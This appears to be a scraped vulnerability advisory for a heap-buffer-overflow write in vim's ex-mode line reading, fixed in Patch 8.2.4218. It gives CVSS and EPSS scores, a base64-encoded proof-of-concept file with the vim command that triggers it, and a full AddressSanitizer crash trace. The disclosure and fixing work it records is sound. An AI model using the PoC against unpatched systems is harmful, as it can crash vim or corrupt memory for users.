7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
47.7%
Heap-buffer-overflow on write in vim
This issue was created to separate this one and was fixed with Patch 8.2.4218.
Steps to reproduce:
echo -n bm9ybTBRgFBTMP8wMDCysDAwMDAwMDAwMDAwMDAw/zD/g7IwMDAwMDAwMDAwjjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAD | base64 -d > heap_ow_poc2
vim -u NONE -i NONE -n -X -Z -e -m -s -S heap_ow_poc2 -c :qa!
==1637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x607000000e66 at pc 0x0000007a6af2 bp 0x7fff3b93fd50 sp 0x7fff3b93fd48
WRITE of size 1 at 0x607000000e66 thread T0
#0 0x7a6af1 in getexmodeline /home/presler/fuzzing/vim_sanitized/src/ex_getln.c:2933:21
#1 0x7371d9 in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:876:46
#2 0x735134 in do_exmode /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#3 0xa27ab8 in nv_exmode /home/presler/fuzzing/vim_sanitized/src/normal.c:3423:2
#4 0x9fedf7 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1120:5
#5 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#6 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
#7 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
#8 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#9 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#10 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
#11 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
#12 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
#13 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#14 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#15 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
#16 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
#17 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
#18 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
#19 0x7fb0cd8730b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#20 0x41db2d in _start (/home/presler/fuzzing/vim_sanitized/src/vim+0x41db2d)
0x607000000e66 is located 0 bytes to the right of 70-byte region [0x607000000e20,0x607000000e66)
allocated by thread T0 here:
#0 0x496589 in realloc (/home/presler/fuzzing/vim_sanitized/src/vim+0x496589)
#1 0x4c7722 in ga_grow_inner /home/presler/fuzzing/vim_sanitized/src/alloc.c:741:10
#2 0x4c74dd in ga_grow /home/presler/fuzzing/vim_sanitized/src/alloc.c:720:9
#3 0x648655 in bracketed_paste /home/presler/fuzzing/vim_sanitized/src/edit.c:4446:26
#4 0x7a4aee in getexmodeline /home/presler/fuzzing/vim_sanitized/src/ex_getln.c:2874:6
#5 0x7371d9 in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:876:46
#6 0x735134 in do_exmode /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#7 0xa27ab8 in nv_exmode /home/presler/fuzzing/vim_sanitized/src/normal.c:3423:2
#8 0x9fedf7 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1120:5
#9 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#10 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
#11 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
#12 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#13 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#14 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
#15 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
#16 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
#17 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#18 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#19 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
#20 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
#21 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
#22 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
#23 0x7fb0cd8730b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/presler/fuzzing/vim_sanitized/src/ex_getln.c:2933:21 in getexmodeline
Shadow bytes around the buggy address:
0x0c0e7fff8170: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00
0x0c0e7fff8180: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
0x0c0e7fff8190: 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 00 00
0x0c0e7fff81a0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c0e7fff81b0: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 01
=>0x0c0e7fff81c0: fa fa fa fa 00 00 00 00 00 00 00 00[06]fa fa fa
0x0c0e7fff81d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff81e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff81f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1637==ABORTING
This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
47.7%